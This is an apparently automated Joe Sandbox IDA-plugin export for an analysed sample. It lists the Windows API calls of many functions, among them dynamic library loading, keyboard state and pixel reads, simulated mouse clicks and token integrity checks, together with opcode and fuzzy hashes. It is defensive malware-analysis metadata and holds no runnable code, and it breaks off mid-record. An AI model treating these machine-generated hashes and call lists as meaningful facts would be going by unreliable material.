                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                            • String ID:
                            • API String ID: 3440857362-0
                            • Opcode ID: 1cd5ce1b698a4901b08f772aae927ddde3bd0c7e317140fe52bcdd7c0e7ae91c
                            • Instruction ID: fbb88744f0857165c07157610fe1b0086ef163f0a1ada3c9025fdd0dfd269737
                            • Opcode Fuzzy Hash: 1cd5ce1b698a4901b08f772aae927ddde3bd0c7e317140fe52bcdd7c0e7ae91c
                            • Instruction Fuzzy Hash: 81512871208305AFD714EF68C881F6ABBE9FF84714F44892DF595872A2DB31E904DB62
                            APIs
                              • Part of subcall function 00D49837: __itow.LIBCMT ref: 00D49862
                              • Part of subcall function 00D49837: __swprintf.LIBCMT ref: 00D498AC
                            • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00DBD927
                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00DBD9AA
                            • GetProcAddress.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00DBD9C6
                            • GetProcAddress.KERNEL32(00000000,?,?,?,00000041,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00DBDA07
                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00DBDA21
                              • Part of subcall function 00D45A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00DA7896,?,?,00000000), ref: 00D45A2C
                              • Part of subcall function 00D45A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00DA7896,?,?,00000000,?,?), ref: 00D45A50
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                            • String ID:
                            • API String ID: 327935632-0
                            • Opcode ID: bd835dbe8daa70adc9667734d49a0972ddd9e1d34c48c9f0446c35587654ad5c
                            • Instruction ID: 4a45d908321b4428a5c7cf288c68813054f65a22adff32b26546422be04bc3f1
                            • Opcode Fuzzy Hash: bd835dbe8daa70adc9667734d49a0972ddd9e1d34c48c9f0446c35587654ad5c
                            • Instruction Fuzzy Hash: D4510735A00206DFCB00EFA8C4959EDB7B5EF19320B148165E956AB312D731ED45CFA1
                            APIs
                            • GetPrivateProfileSectionW.KERNEL32 ref: 00DAE61F
                            • GetPrivateProfileSectionW.KERNEL32 ref: 00DAE648
                            • WritePrivateProfileSectionW.KERNEL32 ref: 00DAE687
                              • Part of subcall function 00D49837: __itow.LIBCMT ref: 00D49862
                              • Part of subcall function 00D49837: __swprintf.LIBCMT ref: 00D498AC
                            • WritePrivateProfileStringW.KERNEL32 ref: 00DAE6AC
                            • WritePrivateProfileStringW.KERNEL32 ref: 00DAE6B4
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                            • String ID:
                            • API String ID: 1389676194-0
                            • Opcode ID: 8c8d094a5fe9468f033cec52dd60fee48cbacdd3425d7a7b188ec19b398cb484
                            • Instruction ID: 47528d9fe7f070fc9f603382ff3af5e89331864781fa308d28264b3a083453c1
                            • Opcode Fuzzy Hash: 8c8d094a5fe9468f033cec52dd60fee48cbacdd3425d7a7b188ec19b398cb484
                            • Instruction Fuzzy Hash: C3510D35A00205DFCB11EF65C991AAEBBF5EF49314B1484A5E809AB362CB31ED11DF70
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ceb61d504131a045bcd67361337f9e3f99f791818888a0943379a28b7e2b710f
                            • Instruction ID: cadd14e3efc4851115fb5842a40fe4592069f6f719242511d24516f127d2f69d
                            • Opcode Fuzzy Hash: ceb61d504131a045bcd67361337f9e3f99f791818888a0943379a28b7e2b710f
                            • Instruction Fuzzy Hash: 3A41D33590421AAFD714DF2CCC48FA9BBA5EB09354F1C4269F955E72E0CB309D41EA71
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: AsyncState$ClientCursorScreen
                            • String ID:
                            • API String ID: 4210589936-0
                            • Opcode ID: 14547a7dad37da25e5bac0cddec186296b1a9c35d260848ad71b25ab075839bb
                            • Instruction ID: 16e44fc5b7c3c672c158092343d3fd584d240b25fa05c67900f2ea3a47911c0c
                            • Opcode Fuzzy Hash: 14547a7dad37da25e5bac0cddec186296b1a9c35d260848ad71b25ab075839bb
                            • Instruction Fuzzy Hash: 02417D35604206FFCB258F68C848AE9BB75FB05360F64835EF868962A0D7359990DBB0
                            APIs
                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D963E7
                            • TranslateAcceleratorW.USER32(?,?,?), ref: 00D96433
                            • TranslateMessage.USER32(?), ref: 00D9645C
                            • DispatchMessageW.USER32(?), ref: 00D96466
                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D96475
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Message$PeekTranslate$AcceleratorDispatch
                            • String ID:
                            • API String ID: 2108273632-0
                            • Opcode ID: cdc3944ed403e54fc3634d7adc3186b43e0c4a38fe32a77c0295a3108bbf5ac1
                            • Instruction ID: efba37996de95771e327690651ba3c28f092673bbd52f8a6ec67ff2d0b79dadb
                            • Opcode Fuzzy Hash: cdc3944ed403e54fc3634d7adc3186b43e0c4a38fe32a77c0295a3108bbf5ac1
                            • Instruction Fuzzy Hash: 5031BE32944646AFDF248FF5CC44FB77BB8AB01300F184165E861D61A0E726D889DB71
                            APIs
                            • GetWindowRect.USER32(?,?), ref: 00D98A30
                            • PostMessageW.USER32 ref: 00D98ADA
                            • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00D98AE2
                            • PostMessageW.USER32 ref: 00D98AF0
                            • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00D98AF8
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: MessagePostSleep$RectWindow
                            • String ID:
                            • API String ID: 3382505437-0
                            • Opcode ID: 7e8816ff0833ae601bafb70501a64332f57d4fef80e179f8733f777181fe2cee
                            • Instruction ID: b3304e70da8be047f74ddeab9489078c2e316d99df8f5bee749ccd0f870cf4e2
                            • Opcode Fuzzy Hash: 7e8816ff0833ae601bafb70501a64332f57d4fef80e179f8733f777181fe2cee
                            • Instruction Fuzzy Hash: 3131C07150021AEBDF14CFA8DD4CADE3BB5EB05715F14822AF965E72D0C7B09914EBA0
                            APIs
                            • IsWindowVisible.USER32(?), ref: 00D9B204
                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00D9B221
                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00D9B259
                            • CharUpperBuffW.USER32(00000000,00000000), ref: 00D9B27F
                            • _wcsstr.LIBCMT ref: 00D9B289
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                            • String ID:
                            • API String ID: 3902887630-0
                            • Opcode ID: 402b731101056b2abf03cb264fe64b19e09fa9c0999ac0b132ce3f5fabc08b92
                            • Instruction ID: e9090af1f067a135c25d803b1a882f40b8c35a7d0752677d5999679217ed5943
                            • Opcode Fuzzy Hash: 402b731101056b2abf03cb264fe64b19e09fa9c0999ac0b132ce3f5fabc08b92
                            • Instruction Fuzzy Hash: 6A2104322042017BEF259B79AD49E7F7BA9DF49720F05413AF805DA2A1EF61DC4097B4
                            APIs
                              • Part of subcall function 00D42612: GetWindowLongW.USER32(?,000000EB), ref: 00D42623
                            • GetWindowLongW.USER32(?,000000F0), ref: 00DCB192
                            • SetWindowLongW.USER32(00000000,000000F0,00000001,?,?,?,?,00DB0E90,00000000,?,00000000), ref: 00DCB1B7
                            • SetWindowLongW.USER32(00000000,000000EC,000000FF,?,?,?,?,00DB0E90,00000000,?,00000000), ref: 00DCB1CF
                            • GetSystemMetrics.USER32(00000004,?,?,?,?,?,?,?,00DB0E90,00000000,?,00000000), ref: 00DCB1F8
                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047), ref: 00DCB216
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Window$Long$MetricsSystem
                            • String ID:
                            • API String ID: 2294984445-0
                            • Opcode ID: b4785c195ba74af628f3a865ecd7f7084aca7e6b0cde0e2b9581bc8be4e4c265
                            • Instruction ID: f3f93b2e1a7628602bbd04d605654ef66b99c5b99f6a84b23484e4222fa1922d
                            • Opcode Fuzzy Hash: b4785c195ba74af628f3a865ecd7f7084aca7e6b0cde0e2b9581bc8be4e4c265
                            • Instruction Fuzzy Hash: B2217E71920253AFCB149F38DC05F6A7BA5EB05331F19463AB962D72E0D730D8509BA0
                            APIs
                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00D99320
                              • Part of subcall function 00D47BCC: _memmove.LIBCMT ref: 00D47C06
                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00D99352
                            • __itow.LIBCMT ref: 00D9936A
                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00D99392
                            • __itow.LIBCMT ref: 00D993A3
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: MessageSend$__itow$_memmove
                            • String ID:
                            • API String ID: 2983881199-0
                            • Opcode ID: d4173d6312c2faa9ed2264b36db977fd7927463e623649bb178306c769555ec7
                            • Instruction ID: cd60ded26a5d01e645bea23ae56f6aae554b9e38a92238f1543216e72cbe3e97
                            • Opcode Fuzzy Hash: d4173d6312c2faa9ed2264b36db977fd7927463e623649bb178306c769555ec7
                            • Instruction Fuzzy Hash: B721D731700209ABDF10AF698C95EEEBBA9EB48710F04402DFD45D72D1DAB1CD4597B1
                            APIs
                            • IsWindow.USER32(00000000), ref: 00DB5A6E
                            • GetForegroundWindow.USER32 ref: 00DB5A85
                            • GetDC.USER32(00000000), ref: 00DB5AC1
                            • GetPixel.GDI32(00000000,?,00000003), ref: 00DB5ACD
                            • ReleaseDC.USER32(00000000,00000003), ref: 00DB5B08
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Window$ForegroundPixelRelease
                            • String ID:
                            • API String ID: 4156661090-0
                            • Opcode ID: 79111ae822e213cb5bb919b4be5183d8571e72a9a4d2a502f09865b5335e2898
                            • Instruction ID: 4a261b81edfcb6d31f3199d6862290fb4e06f3f66e9d9b5fc15056899c16369a
                            • Opcode Fuzzy Hash: 79111ae822e213cb5bb919b4be5183d8571e72a9a4d2a502f09865b5335e2898
                            • Instruction Fuzzy Hash: 17216F75A00205AFDB14EF69D884A9ABBE5EF48310F148479F84AD7362DA30AD01DBB0
                            APIs
                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 00D4134D
                            • SelectObject.GDI32(?,00000000), ref: 00D4135C
                            • BeginPath.GDI32(?), ref: 00D41373
                            • SelectObject.GDI32(?,00000000), ref: 00D4139C
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ObjectSelect$BeginCreatePath
                            • String ID:
                            • API String ID: 3225163088-0
                            • Opcode ID: 5a80b2f47cfd113953f77a47df4671565d1ecba669f7feb48ba9c543fbaf01e7
                            • Instruction ID: 3d2b1934a7f69770feb77ae79db72d9c824a8b85cbefff9e362ba4b01712b1e9
                            • Opcode Fuzzy Hash: 5a80b2f47cfd113953f77a47df4671565d1ecba669f7feb48ba9c543fbaf01e7
                            • Instruction Fuzzy Hash: 21216531800709DFDB159F16EC4976A7BE5F700761F18822AF854A61B0D37199D9DF70
                            APIs
                            • GetCurrentThreadId.KERNEL32 ref: 00DA4ABA
                            • __beginthreadex.LIBCMT ref: 00DA4AD8
                            • MessageBoxW.USER32 ref: 00DA4AED
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00DA4B03
                            • CloseHandle.KERNEL32(00000000), ref: 00DA4B0A
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                            • String ID:
                            • API String ID: 3824534824-0
                            • Opcode ID: 5b736fdf6f2c0c6e44f3f735d0a246af692c5cfc83c154852e35f51dba6a0e18
                            • Instruction ID: deab856ae9e8fbcdb0fc5152e4f53a681d3e9085ceac63b7bb1df281b642a6ce
                            • Opcode Fuzzy Hash: 5b736fdf6f2c0c6e44f3f735d0a246af692c5cfc83c154852e35f51dba6a0e18
                            • Instruction Fuzzy Hash: 3D11E576904715BFD7008FA99C04ADB7BADEB85320F184265F824D33A0D6B1C9448BB0
                            APIs
                            • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00D9821E
                            • GetLastError.KERNEL32(?,00D97CE2,?,?,?), ref: 00D98228
                            • GetProcessHeap.KERNEL32(00000008,?,?,00D97CE2,?,?,?), ref: 00D98237
                            • HeapAlloc.KERNEL32(00000000,?,00D97CE2,?,?,?), ref: 00D9823E
                            • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00D98255
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                            • String ID:
                            • API String ID: 842720411-0
                            • Opcode ID: d18eb270e30c8f7220fec4b95bc01a7fe423f9d5b269186f764a2d8cff623b19
                            • Instruction ID: 038aeb9abb75b641054357bb1323a0b0666b9d3108aca95867224cab2f5c163c
                            • Opcode Fuzzy Hash: d18eb270e30c8f7220fec4b95bc01a7fe423f9d5b269186f764a2d8cff623b19
                            • Instruction Fuzzy Hash: FC011D71641706BFDF204FA6DC48DAB7FADEF8A755B54056AF849C3260DA319C00EA70
                            APIs
                            • CLSIDFromProgID.OLE32 ref: 00D97127
                            • ProgIDFromCLSID.OLE32(?,00000000), ref: 00D97142
                            • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00D97044,80070057,?,?), ref: 00D97150
                            • CoTaskMemFree.OLE32(00000000), ref: 00D97160
                            • CLSIDFromString.OLE32(?,?), ref: 00D9716C
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: From$Prog$FreeStringTasklstrcmpi
                            • String ID:
                            • API String ID: 3897988419-0
                            • Opcode ID: c0f98bf8c830e6ea144c39a0f0fc688929acae2ea8d67100dd58705c9376a8b1
                            • Instruction ID: e660cdd9a35ec2e4b58fd21d29dc1d6119c4982c7c47b1cbd66aa61b6ce87898
                            • Opcode Fuzzy Hash: c0f98bf8c830e6ea144c39a0f0fc688929acae2ea8d67100dd58705c9376a8b1
                            • Instruction Fuzzy Hash: 6E017CB2621306BBDB114F64DC44EAA7BAEEF44791F141064FD08E2320D731DD419BB0
                            APIs
                            • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00DA5260
                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00DA526E
                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00DA5276
                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00DA5280
                            • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00DA52BC
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: PerformanceQuery$CounterSleep$Frequency
                            • String ID:
                            • API String ID: 2833360925-0
                            • Opcode ID: 59d66d50d373e271aed694875db8d2c2946f3e8e7a57dd4225bbc7e7d8a8b4e1
                            • Instruction ID: 019709f1224edc4347ff52db4ee6e1adac2cafe90fc9fd03ef354b1513b8ad87
                            • Opcode Fuzzy Hash: 59d66d50d373e271aed694875db8d2c2946f3e8e7a57dd4225bbc7e7d8a8b4e1
                            • Instruction Fuzzy Hash: 3C011731D01B1ADBCF00EFE4E849AEDBB79FB0A711F450156E945F2245CB3095548BB9
                            APIs
                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00D98121
                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00D9812B
                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00D9813A
                            • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00D98141
                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00D98157
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: HeapInformationToken$AllocErrorLastProcess
                            • String ID:
                            • API String ID: 44706859-0
                            • Opcode ID: bb595ef370648134d8d58f00376f4b1115dba84fd9532f00120ef31b768a249d
                            • Instruction ID: 8353eb39f382ab3a39b767954e6025b5ac62197b10e2f2200c2742421dfb94ac
                            • Opcode Fuzzy Hash: bb595ef370648134d8d58f00376f4b1115dba84fd9532f00120ef31b768a249d
                            • Instruction Fuzzy Hash: EEF06271200306BFEB110FA5EC89EAB3BADFF4AB54B040025F986D6250CB619D41EA70
                            APIs
                            • GetDlgItem.USER32(?,000003E9), ref: 00D9C1F7
                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 00D9C20E
                            • MessageBeep.USER32(00000000), ref: 00D9C226
                            • KillTimer.USER32 ref: 00D9C242
                            • EndDialog.USER32 ref: 00D9C25C
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
